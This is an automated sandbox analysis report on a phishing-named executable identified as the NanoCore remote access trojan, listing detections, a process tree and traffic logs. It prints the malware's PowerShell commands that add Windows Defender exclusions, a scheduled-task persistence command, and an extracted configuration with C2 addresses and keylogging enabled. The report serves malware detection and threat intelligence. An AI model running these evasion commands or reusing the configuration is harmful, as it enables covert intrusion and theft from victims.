Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report #RFQ ORDER7678432213211.exe

Overview

General Information

Sample Name:#RFQ ORDER7678432213211.exe
Analysis ID:451085
MD5:2f286cd817b368e8a747e8f0d8f28825
SHA1:e49beec02d942e12b0dad74d81ab8ed4f02667e2
SHA256:b291d719522053a662cadd70b131668a1d953d4c4dd648e8a5647b689eb6341d
Tags:exeNanoCoreRAT
Infos:

Most interesting Screenshot:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Nanocore Rat
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: NanoCore
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Nanocore RAT
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Defender Exclusion
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • #RFQ ORDER7678432213211.exe (PID: 4900 cmdline: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' MD5: 2F286CD817B368E8A747E8F0D8F28825)
    • powershell.exe (PID: 6052 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2416 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 3348 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 1848 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • #RFQ ORDER7678432213211.exe (PID: 1328 cmdline: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe MD5: 2F286CD817B368E8A747E8F0D8F28825)
  • cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "oluwa", "Domain1": "194.5.98.120", "Domain2": "joseedward5001.ddns.net", "Port": 1604, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x1f1db:$x1: NanoCore.ClientPluginHost
  • 0x1f1f5:$x2: IClientNetworkHost
00000012.00000002.493425460.0000000005840000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x1f1db:$x2: NanoCore.ClientPluginHost
  • 0x22518:$s4: PipeCreated
  • 0x1f1c8:$s5: IClientLoggingHost
00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x59eb:$x1: NanoCore.ClientPluginHost
  • 0x5b48:$x2: IClientNetworkHost
00000012.00000002.493258723.00000000057F0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x59eb:$x2: NanoCore.ClientPluginHost
  • 0x6941:$s3: PipeExists
  • 0x5be1:$s4: PipeCreated
  • 0x5a05:$s5: IClientLoggingHost
00000012.00000002.493293452.0000000005800000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x39eb:$x1: NanoCore.ClientPluginHost
  • 0x3a24:$x2: IClientNetworkHost
Click to see the 21 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x41ee:$x1: NanoCore.ClientPluginHost
  • 0x422b:$x2: IClientNetworkHost
18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x41ee:$x2: NanoCore.ClientPluginHost
  • 0x7641:$s4: PipeCreated
  • 0x4218:$s5: IClientLoggingHost
18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x3deb:$x1: NanoCore.ClientPluginHost
  • 0x3f48:$x2: IClientNetworkHost
18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
  • 0x3deb:$x2: NanoCore.ClientPluginHost
  • 0x4d41:$s3: PipeExists
  • 0x3fe1:$s4: PipeCreated
  • 0x3e05:$s5: IClientLoggingHost
18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x350b:$x1: NanoCore.ClientPluginHost
  • 0x3525:$x2: IClientNetworkHost
Click to see the 51 entries

Sigma Overview

AV Detection:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

E-Banking Fraud:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

System Summary:

barindex
Sigma detected: Powershell Defender ExclusionShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' , ParentImage: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ParentProcessId: 4900, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', ProcessId: 6052
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe' , ParentImage: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ParentProcessId: 4900, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe', ProcessId: 6052

Stealing of Sensitive Information:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Remote Access Functionality:

barindex
Sigma detected: NanoCoreShow sources
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe, ProcessId: 1328, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmpMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "oluwa", "Domain1": "194.5.98.120", "Domain2": "joseedward5001.ddns.net", "Port": 1604, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exeReversingLabs: Detection: 13%
Multi AV Scanner detection for submitted fileShow sources
Source: #RFQ ORDER7678432213211.exeReversingLabs: Detection: 13%
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Roaming\XgPYsUfalKn.exeJoe Sandbox ML: detected
Machine Learning detection for sampleShow sources
Source: #RFQ ORDER7678432213211.exeJoe Sandbox ML: detected
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpackAvira: Label: TR/NanoCore.fadte
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen7
Source: #RFQ ORDER7678432213211.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: #RFQ ORDER7678432213211.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: mscorlib.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483167361.000000000124C000.00000004.00000020.sdmp
Source: Binary string: System.pdb source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483005071.0000000001217000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]18_2_0658AEB0
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]18_2_0658AEA1

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49726 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49729 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49730 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49731 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49735 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49737 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49738 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49739 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49740 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49742 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49744 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49745 -> 194.5.98.120:1604
Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 194.5.98.120:1604
C2 URLs / IPs found in malware configurationShow sources
Source: Malware configuration extractorURLs: 194.5.98.120
Source: Malware configuration extractorURLs: joseedward5001.ddns.net
Source: global trafficTCP traffic: 192.168.2.3:49726 -> 194.5.98.120:1604
Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: unknownTCP traffic detected without corresponding DNS query: 194.5.98.120
Source: powershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000008.00000002.424050500.0000000004F71000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.agfamonotype.
Source: powershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comF
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.220096464.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comaV.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.224155563.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasva
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.219670990.000000000564F000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comgrita
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comd
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.215745931.0000000000DFC000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comp
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.222450009.0000000005677000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.222450009.0000000005677000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/W
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.223772397.000000000564C000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmI;
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmp, #RFQ ORDER7678432213211.exe, 00000000.00000003.218259854.000000000564A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp//tr
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/O.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/X7e
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-f
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/c.U
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmp, #RFQ ORDER7678432213211.exe, 00000000.00000003.218259854.000000000564A000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218446869.0000000005646000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/O.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/j.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-u
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218089594.0000000005642000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/rV.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218446869.0000000005646000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218359434.000000000564F000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/u.
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.218561472.0000000005649000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: #RFQ ORDER7678432213211.exe, 00000000.00000003.217505680.0000000005654000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: powershell.exe, 0000000A.00000003.386127494.00000000076E4000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000003.389513372.0000000005A9B000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.395464833.00000000051BF000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

E-Banking Fraud:

barindex
Yara detected Nanocore RATShow sources
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5944629.16.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 18.2.#RFQ ORDER7678432213211.exe.408d071.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 00000012.00000002.477033384.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.493731765.0000000005940000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.490625846.0000000004081000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: #RFQ ORDER7678432213211.exe PID: 1328, type: MEMORY

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.57f0000.8.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5830000.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.4088a48.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.6310000.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.57e0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5940000.17.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.5810000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 18.2.#RFQ ORDER7678432213211.exe.584e8a4.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
